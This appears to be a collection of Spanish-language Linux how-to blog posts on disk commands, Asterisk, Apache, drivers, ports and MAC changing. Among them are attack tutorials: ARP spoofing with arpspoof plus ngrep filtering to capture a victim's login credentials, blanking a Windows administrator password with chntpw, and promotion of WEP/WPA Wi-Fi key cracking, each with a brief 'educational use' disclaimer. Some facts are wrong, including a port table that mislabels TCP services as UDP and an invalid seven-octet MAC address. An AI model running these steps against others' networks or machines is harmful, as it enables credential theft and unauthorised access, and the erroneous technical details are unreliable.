Algunos comandos básicos para el manejo por consola de sistemas GNU/Linux
Mostrar el uso y espacio actual del o los discos duros del sistema
df -h
donde:
df = disk free (Espacio libre)
-h = Human (para que aparesca en GB o M)
Mostrar el tamaño de cada uno de los directorios de una carpeta y al final sumar todos los valores y darnos un total de la carpeta
du -h –max-depth=1
Listar los archivos de diferentes maneras (uno de lso mas utiles para mi)
ls -t1shr | wc
-t = organiza por fecha
-1 = muestra solo el nombre del archivo
-s = muestra el tamaño
-h = muestra en Megas o GB
-r = ordena invertidamente de mas viejo a mas nuevo
| wc = muestra el total de archivos
Saludos, espero que les sirvan
[How to] Configurar extensiones en Asterisk sip.conf
extensiones
Holasss
acá mostraré un ejemplo de como configurar el archivo sip.conf ubicado en /etc/asterisk
[general] ;todo el contesto general
bindport=5060 ;puerto por el que escucha el asterisk
bindaddr=0.0.0.0 ;desde que sitios recivira conexiones
nat=yes ;aceptar peticiones nat
language=es ;el idioma con el que se conectan los puntos
disallow=all ;negar todo, despues aceptamos peticiones
allow=g729,alaw ;permitir que codecs utilizar, en este caso g729
allow=alaw
allow=gsm
allow=ulaw
allow=h264 ;codec de video
context=demo
canreinvite=no ;para que la comunicacion siempre pase por el servidor asterisk
videosupport=yes ;activar video conferencia
;externip=201.217.206.12 ;por la ip publica que saldra la comunicacion
[ekiga] ;un contesto particual, una extencion en este caso
type=friend ;tipo de contexto
username=101 ;nombre de usuario, no nescesariamente tiene que ser un número
secret=ekiga ;contraseña para logearse
nat=yes ;para que este punto no pueda hacer nat, es decir, tiene que estar en la red local
disallow=all ;desabilitamos todos los codecs
allow=alaw ;codec de audio alaw
callerid=ekiga <100> ;caller id
host=dynamic ;la ip de donde estara el telefono. para los telefonos estas son dinamica pero para las troncales es estatica
qualify=yes ;para el estado de la latencia
deny=0.0.0.0/0.0.0.0 ;denegar que el usuario se conecte de caulquier punto
permit= 192.168.0.0/255.255.255.0 ;permitir que solo se logee desde la nat
context=extlocal ;contextyo que emos creado en el extension.conf donde se comfiguran las extenciones
[ekiga2] ;un contesto particual, una extencion en este caso
type=friend ;tipo de contexto
username=ekiga2 ;nombre de usuario
secret=123456 ;contraseña para logearse
nat=yes ;para que este punto no pueda hacer nat, es decir, tiene que estar en la red local
disallow=all ;desabilitamos todos los codecs
allow=alaw ;codec de audio alaw
callerid=ekiga2 <200> ;caller id
host=dynamic ;la ip de donde estara el telefono. para los telefonos estas son dinamica pero para las troncales es estatica
qualify=yes ;para el estado de la latencia
deny=0.0.0.0/0.0.0.0 ;denegar que el usuario se conecte de caulquier punto
permit= 192.168.0.0/255.255.255.0 ;permitir que solo se logee desde la nat
[ekiga3] ;un contesto particual, una extencion en este caso
type=friend ;tipo de contexto
username=ekiga3 ;nombre de usuario
secret=ekiga3 ;contraseña para logearse
nat=yes ;para que este punto no pueda hacer nat, es decir, tiene que estar en la red local
disallow=all ;desabilitamos todos los codecs
allow=alaw ;codec de audio alaw
callerid=ekiga3 <300> ;caller id
host=dynamic ;la ip de donde estara el telefono. para los telefonos estas son dinamica pero para las troncales es estatica
qualify=yes ;para el estado de la latencia
deny=0.0.0.0/0.0.0.0 ;denegar que el usuario se conecte de caulquier punto
permit= 192.168.0.0/255.255.255.0 ;permitir que solo se logee desde la nat
;en este caso enlazaremos con un dispositivo el cual saca llamadas a celular
[gxw] ;nos permitira comunicarnos con el getway
type=peer ;solo permitira hacer llamadas
host=192.168.0.119
port=5060 ;como le colocamos host estatico le debemos decir que puerto usar
qualify=yes
nat=yes
disallow=all
allow=alaw
allow=ulaw
allow=gsm
insecure=port,invite
Esper oque les sirva
Saludos!!!
Instalacion Y Configuracion de Apache
INSTALACION Y CONFIGURACION DEL APACHE
Para instalar apache primero debemos descargarnos la versión de código fuente de apache luego de eso la descomprimimos hay q tener en cuenta q el demonio httpd necesitan funcionar con la hora correcta por eso podemos utilizar ntpdate que nos permite sincronizar la hora nuestra con la de un servidor ntp en el archivo de configuracion del ntpdate que se encuentra en etc/defautl/ntpdate hay una linea NTPSERVERS la hacemos igual al servidor con queremos sincronizar y en la opcion de NTPOPTIONS la hacemos igual –u que indicar que esa conexión es sin privilegios.
Una vez terminado todo esto se procede a configurar la compilacion del httpd la opcion mas importante del apache es –prefix que es donde apache va hacer instalado sino se indicar por defecto en la instalación en usr/local/apache2
Una vez instalado queda configurarlo correctamente para su funcionamiento esto se hace dentro del archivo httpd.conf este archivo contiene todas las directivas para configuración del demonio httpd
Creación de Host Virtuales
La utilidad de los host virtuales es que nos permite tener múltiples páginas web con una sola dirección ip para eso primero debemos editar el archivo /etc/host este archivo primero ponemos la dirección ip y después ponemos el nombre del dominio por ejemplo 192.168.1.65 www.tribukogi.com guardamos y vamos al archivo /usr/local/apache2/conf/httpd.conf aquí copiamos las directivas necesarias para hacerlo como sigue
NameVirtualHost “IP:Puerto”
<VirtualHost dirección: puerto>
ServerName “Nombre del Servidor que Configuramos en hosts”
DocumentRoot “ruta de la carpeta donde esta los archivo de la pagina web”
ErrorLog “Ruta donde se Guardaron los Log de Errores”
CustomLog “Ruta donde se Guardaron los Log detallados”
ServerAdmin “Correo Electronico del Administrador del Sitio”
</VirtualHost>
Permitir Acceso al Servidor Web
Apache permite que apliquemos políticas a nuestros servidor permitiendo que ciertos usuario puedan ver la información que queramos o ingresar a una determinada zona para eso apache proporciona la directiva <Directory “Nombre Fichero”></Directory> dentro de ellas especificamos las reglas que queremos aplicar al directorio indicado para eso tenemos que agregar un usuario de la siguiente forma htpasswd –c /Rutadirectorio/nombrearchivo usuario la opción –c indica que cree un archivo nuevo de para guardar las contraseña la opción usuario un nombre de usuario que queramos que aparezcan y nos pide un password lo ingresamos y ya tenemos un usuario que valido para el sistema
<Directory “/www”>
AuthName “Restricted File”
AuthType Basic|Digest
AuthUserFile “Ruta donde se guardan los nombre de usuario y password”
AuthGroup “Ruta donde se guardan los nombre de los grupos
Require Valid-User|User “nombre de usuario”|Group “Nombre de Grupo”
Order deny, allow
Deny from all|”Direcion IP”
Allow from all|”Direccion IP”
</Directory>
Apache por defecto tiene especificado que los usuarios no puedan tener permisos sobre los ficheros del sistema así que si en DocumentRoot la ruta de un directorio distinto de usr/local/apache/htdocs no podremos visualizar nuestros host virtuales por estos no tiene permisos para visualizarlos acontinuacion explicare cada unas de las opciones que aparecen en la Etiqueta <Directory>
· AuthName:esta opción le indica al navegador que por cada archivo pida autentificación
· AuthType: esta directiva indica el tipo de autentificación que se utilizara existen dos Basic que envía el nombre de usuario y la contraseña en formato de texto plano o Digest que la envía Encriptado
· AuthUserFile: con esta indicaremos que donde se encuentra el archivo donde encontraremos los nombre de usuario y las contraseñas este archivos es el mismo que se creó con htpasswd
· AuthGroup: al igual que la anterior pero en este caso le indicamos la ruta donde encontrar el nombre del grupo que contiene los usuario el archivo del grupo debe tener el siguiente formato Nombre_Grupo:Usuario1,Usuario2 pero cada usuario debe estar registrado como se mostro anteriormente
· Require: en esta directiva especificamos a que usuario o grupos se le otorgara permiso sobre dicho directorio
Las últimas directivas son muy importantes por que consideremos que tenemos un usuario en nuestro foro que envía mensaje obscenos y queremos denegar el contenido de la pagina entonces simplemente ponemos la directiva Deny from “Direccion Ip del Usuario” y listo y el contenido no podrá servisto por el usuario o si quieres permitir el acceso a un usuario simplemente utiliza Allow con los mismos parametros, Order simplemente significa el orden en que se aplicaran las politicas
[How to] Como instalar Asterisk en sistemas GNU/Linux
Asterisk
Buen Día
Primero instalamos el ssh para poder conectarnos al servidor asterisk remotamente en un futuro
aptitude install ssh
descargamos los paquetes de asterisk de la pagina oficial (El dia que escribo esto estas son las ultimas versiones)
http://www.asterisk.org/downloads
Asterisk 1.6.1.1 *Asterisk
DAHDI Linux 2.1.0.4 *Driver para la tarjeta fisica
DAHDI Tools 2.1.0.2 *Herramientas de monitoreo y mas
Libpri 1.4.10 *Librerias del redsi
Addons 1.6.1.0 *Addons como el formato mp3, los codecs privativos h323, y demas
despues de descargarlos los ubicamos en la carpeta /usr/src/ , siempre que se desea instalar algo compilando debemos ubicarlo allí
instalamos el build-essential el “automake”, el “autoconf” y los headers
aptitude install build-essential automake autoconf linux-headers-`uname -r`
vamos a la carpeta /usr/src/
sudo tar xzvf Asterisk 1.6.1.1.tar.gz
sudo tar xzvf DAHDI Linux 2.1.0.4.tar.gz
sudo tar xzvf DAHDI Tools 2.1.0.2.tar.gz
sudo tar xzvf Libpri 1.4.10.tar.gz
sudo tar xzvf Addons 1.6.1.0.tar.gz
primero instalamos los drivers de la tarjeta DAHDI Linux 2.1.0.4 de la suiguiente manera, nos ubicamso en /usr/src/DAHDI Linux
sudo make
sudo make install
si todo sale bien saldra este mensaje
###################################################
###
### DAHDI installed successfully.
### If you have not done so before, install the package
### dahdi-tools.
###
###################################################
hacemos lo mismo para instalar DAHDI Tools, nos ubicamos en /usr/src/DAHDI-Tools
sudo ./configure
sudo make
sudo make menuselect *(este funciona si no se tiene entorno grafico instalado y permite seleccionar las cosas a instalar)
sudo make install
y si funciona saldra algo asi
###################################################
###
### DAHDI tools installed successfully.
### If you have not done so before, install init scripts with:
###
### make config
###
###################################################
make config
de nuevo hacemos lo mismo para instalar Libpri, nos ubicamos en /usr/src/Libpri-1.4.10
sudo ./configure
sudo make
sudo make install
ya solo quedan faltando dos paquetes, seguismo con el asterisk1.6.1 nos ubicamos en /usr/src/asterisk1.6.1
./configure
NOTA: si nos aparece este error “configure: error: *** termcap support not found” instalamos el paquete “sudo apt-get install libncurses-dev”
luego
make menuselect
sudo make
sudo make instal
make config
make samplesl
Para finalizar instalaremos el ultimo paquete, nos ubicaremos den la ruta /usr/src/asterisk-addons-1.6.1.0 y haremos lo mismo
./configure
make menuselect
make
make install
make config
make samples
Modificar el Makefile para que guarde los cdr en mysql con el accountcode dentro de la carpeta de /usr/src/asterisk-addons-1.6.1.0
agregamos la linea en al parte del archivo Makefile ubicado en la carpeta asterisk-addon
CFLAGS+=-DMYSQL_LOGUNIQUEID #estos se despues del ./configure y antes del make
Solo Falta configurarlo, eso lo colocare en otro capitulo
Saludos
[How to] Como conseguir las contraseñas de redes inalambricas WEP, WPA y WPA2
Freedoom
En los ultimos dias he probado la debilidad de las redes inalambricas y acá les dejo unos buenos manuales muy bien explicados para detectar las contraseñas de las redes inalambricas encritadas bajo WEP, WPA y WPA2, los he hecho en un accesspoint casero y han funcionado a la perfección, les recuerdo que la distribucion de linux usada para las pruebas fue BackTrack el cual pueden descargar de el siguiente link
Antes de darle los links debo decirles que para poder conseguir los datos de redes inalambricas, debe existir almenos un equio conectado inalambricamente al Access point ya que cada vez que el AP (Access point) transmite los datos allí viaja la contraseña, lo que hacemos nosotros es caturar los paquetes que viajen por el espectro electromagnetico los almacenamos y despues de tener suficientes pasamos a desencriptarlos todo esto es la teoria, ahora vamos a la practica
Para claves WEP
Para claves WPA y WPA2
Simple crackeo de claves WPA y WPA2
RECUERDEN HACER ESTO EN REDES PROPIAS Y CON FINES EDUCATIVOS
Saludos
[How to] Como capturar los datos de una red LAN
Un paquete Capturado!
Antes que nada este tutorial esta diseñado para implementar bajo GNU/Linux (no se si las aplicaciones existan para windows)
Primero
Activamos el modo promiscuo
sysctl -w net.ipv4.ip_forward=1
despues infectamos la tabla arp constantemente con
arpspoof -i eth0 192.168.20.128
donde
eth0 = es la interface
192.168.20.128 = es la victima
despues en otra consola
Luego para capturar los datos a las páginas que accesa colcoamos el siguiente comando
ngrep -W byline -wi 'user|paasword' | tee /home/trafico.out
donde
user = es el nombre del campo donde se ingresa el nombre de usuario
password = es el nombre del campo donde se ingresa la contraseña
tee /home/trafico.out = esto nos permite grabar la informacion en u narchivo y luego revisarlo detenidamente
‘user|paasword’ en si es un filtro donde uno peude colocar cualquier cosa
PD: la W es MAYUSCULA!
Saludis
Recuerden usar esto en redes propias o con respectivo permiso y solo con fines educativos, no me hago responsable por cualesquier daño
[How to] Como instalar los drivers de tarjetas de video NVIDIA en backtrack 4 beta
Driver Nvidia
Primero que todo antes coloque como hacerlo en debian luegod e borrar debian e instalar backtrack 4 (BT) intente hacerlo com oen debian y no finciono :’( asi que me toco volver a buscar y despeus de dos noches de jalandole a eso porfin los resultados esperados
Primero descargamos el driver segun nuestro procesador
el mio es un intel x86
http://linux.softpedia.com/get/System/Hardware/nVidia-Linux-Display-Driver-IA32-7787.shtml
para AMD64/EM64T
http://linux.softpedia.com/get/System/Hardware/nVidia-Linux-Display-Driver-AMD64-EM64T-11290.shtml
para FreeBSD
http://linux.softpedia.com/get/System/Hardware/nVidia-FreeBSD-Display-Driver-x86-11291.shtml
y para solaris
http://linux.softpedia.com/get/System/Hardware/nVidia-Solaris-Display-Driver-x86-46513.shtml
despues de descargar el driver en la consola de backtrack (la cual carga por defecto) colocamos el siguiente comando
sh NVIDIA-Linux-x86-180.60-pkg1.run
Seguimos los pasos que nos muestra en pantalla y listo al finalizar es solo ejecutar
startx
Saludos!
[How to] Como reiniciar las contraseñas de los usuarios de sistemas operativos Windows desde GNU/Linux
Seguridad!!! en windows
Primero instalaremos el paquete (el BackTrack 4 lo trae por defecto)
sudo aptitude install chntpw
luego procedemos a ver los usuarios y cambiar o dejar el password en blanco
sudo chntpw -l -i /mnt/c/WINDOWS/system32/config/SAM
donde
-i es para crear una interface amigable
-l es para listar los usuarios que encontremos en ela rchivo SAM
/mnt/c/WINDOWS/system32/config/SAM es donde previamente hemos montado la partición de windows y localizamos el archivo SAM que por defecto esta en /WINDOWS/system32/config/SAM
nos mostrara el siguiente menú
sudo chntpw -l -i /mnt/c/WINDOWS/system32/config/SAM
chntpw version 0.99.5 070923 (decade), (c) Petter N Hagen
Hive name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c
Page at 0x9000 is not 'hbin', assuming file contains garbage at end
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 327/29944 blocks/bytes, unused: 3/2568 blocks/bytes.
* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0
======== chntpw Main Interactive Menu ========
Loaded hives:
1 – Edit user data and passwords
2 – Syskey status & change
3 – RecoveryConsole settings
- – -
9 – Registry editor, now with full write support!
q – Quit (you will be asked if there is something to save)
What to do? [1] -> 1
Seleccionaremos la opción 1 para reiniciar el password y veremos algo asi
What to do? [1] -> 1
===== chntpw Edit User Info & Passwords ====
| RID -|———- Username ————| Admin? |- Lock? –|
| 01f4 | Administrador | ADMIN | |
| 03e8 | Asistente de ayuda | | dis/lock |
| 01f5 | Invitado | | dis/lock |
| 03eb | pibe | ADMIN | *BLANK* |
| 03ea | SUPPORT_388945a0 | | dis/lock |
| 03f6 | __vmware_user__ | | |
Select: ! – quit, . – list users, 0x – User with RID (hex)
or simply enter the username to change: [Administrador] Administrator
en mi caso seleccionare el “Administrator” y aparecera esto
or simply enter the username to change: [Administrador] Administrator
RID : 0500 [01f4]
Username: Administrador
fullname:
comment : Cuenta para la administraci�n del equipo o dominio
homedir :
User is member of 1 groups:
00000220 = Administradores (which has 2 members)
Account bits: 0×0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don’t expir | [ ] Auto lockout | [ ] (unknown 0×08) |
[ ] (unknown 0×10) | [ ] (unknown 0×20) | [ ] (unknown 0×40) |
Failed login count: 0, while max tries is: 0
Total login count: 0
- – - – User Edit Menu:
1 – Clear (blank) user password
2 – Edit (set new) user password (careful with this on XP or Vista)
3 – Promote user (make user an administrator)
(4 – Unlock and enable user account) [seems unlocked already]
q – Quit editing user, back to user select
Select: [q] >
y para finalizar colocaremos la Opción 1 que es para dejar el password en blanco
Password cleared!
y por ultimo le damos “!” luego “q” para salir nos pregunta que si deseamos guardar le damos “Yes”
Eso es todo amigos!
Recuerden usar esto bajo autorización y/o con fines educativos. No me hago responsable por daños o perjuicios
Si desean mas info
man chntpw
chntpw -h
Principales Puertos del protocolo TCP y UDP
Puerto de Buenaventura (Este puerto no existe en los sitemas informáticos 
)
Bueno acá les traigo una lista de puertos y protocolos de los mas comunes y mas usados, logicamente faltaran algunos pero acá estan lo prinicpales
| Puertos UDP | ||||
| #pop3 | 110 | (udp) | ||
| #imap | 143 | (udp) | ||
| #imaps | 993 | (udp) | ||
| #po3s | 995 | (udp) | ||
| #https | 443 | (udp) | ||
| #http-alt | 8080 | (udp) | web cache | |
| #ssh | 22 | (udp) | ||
| #msn | 1863 | (udp) | ||
| #irc | 194 | (udp) | ||
| #ircs | 994 | (udp) | ||
| #telnets | 992 | (udp) | ||
| #mysql | 3306 | (udp) | ||
| #dhcp | 68 | (udp) | Cliente | |
| #dhcp | 67 | (udp) | Server | |
| #gmail | 465 | (udp) | ||
| #sip | 5060 | (udp) | ||
| #dns | 53 | (udp) |
| Puertos TCP | ||||
| #ftp | 21 | |||
| #smtp | 25 | |||
| #pop3 | 110 | (udp) | ||
| #imap | 143 | (udp) | ||
| #imaps | 993 | (udp) | ||
| #po3s | 995 | (udp) | ||
| #http | 80 | |||
| #https | 443 | (udp) | ||
| #http-alt | 8080 | (udp) | web cache | |
| #whois | 43 | |||
| #ssh | 22 | (udp) | ||
| #msn | 1863 | (udp) | ||
| #irc | 194 | (udp) | ||
| #ircs | 994 | (udp) | ||
| #ircd | 6667 | |||
| #telnet | 23 | |||
| #telnets | 992 | (udp) | ||
| #mysql | 3306 | (udp) | ||
| #dhcp | 68 | (udp) | Cliente | |
| #dhcp | 67 | (udp) | Server | |
| #gmail | 465 | (udp) | ||
| #sip | 5060 | (udp) | ||
| #dns | 53 | (udp) |
La mayoria de estos trabajan en ambos, tanto en TCP como en UDP, esto puede ser util a la hora de configurar un cortafuegos como iptables
Espero que les haya servido
Si desean tener mas informacion hagan un
cat /etc/services
Saludillos!!!
[How to] Cambiar la dirección MAC en sistemas GNU/Linux
Holas para los que piensan que la MAC es estática pues tienen razón y los que creen que no se puede cambiar estan errados en linux hay varias maneras de hacerlo una es con el comando ifconfig pero en e ste caso explicare otra con un comando diferente
priemro descargamos la aplicación
sudo aptitude install macchanger
Luego procedemos a desactivar la tarjeta de red para evitar conflictos (en mi caso es la interface 0)
sudo ifconfig eth0 down
Ahora si poemos cambiar la direccion mac tranquilamente
macchanger --mac=10:10:10:10:10:10:10 eth0
donde
10:10:10:10:10:10:10 es la nueva dirección mac que deseamos colocarle a la tarjeta de red
y eth0 es la interface a la cual le cambiaremos la mac
despues de cambiar la MAC procedemos a subir de nuevo la tarjeta con
ifconfig eth0 up
y listo ya hemos cambiado la dirección MAC
Logicamente el macchanger tiene un monton de utilidades para mas información
man macchanger
y
macchanger --help
Suerte!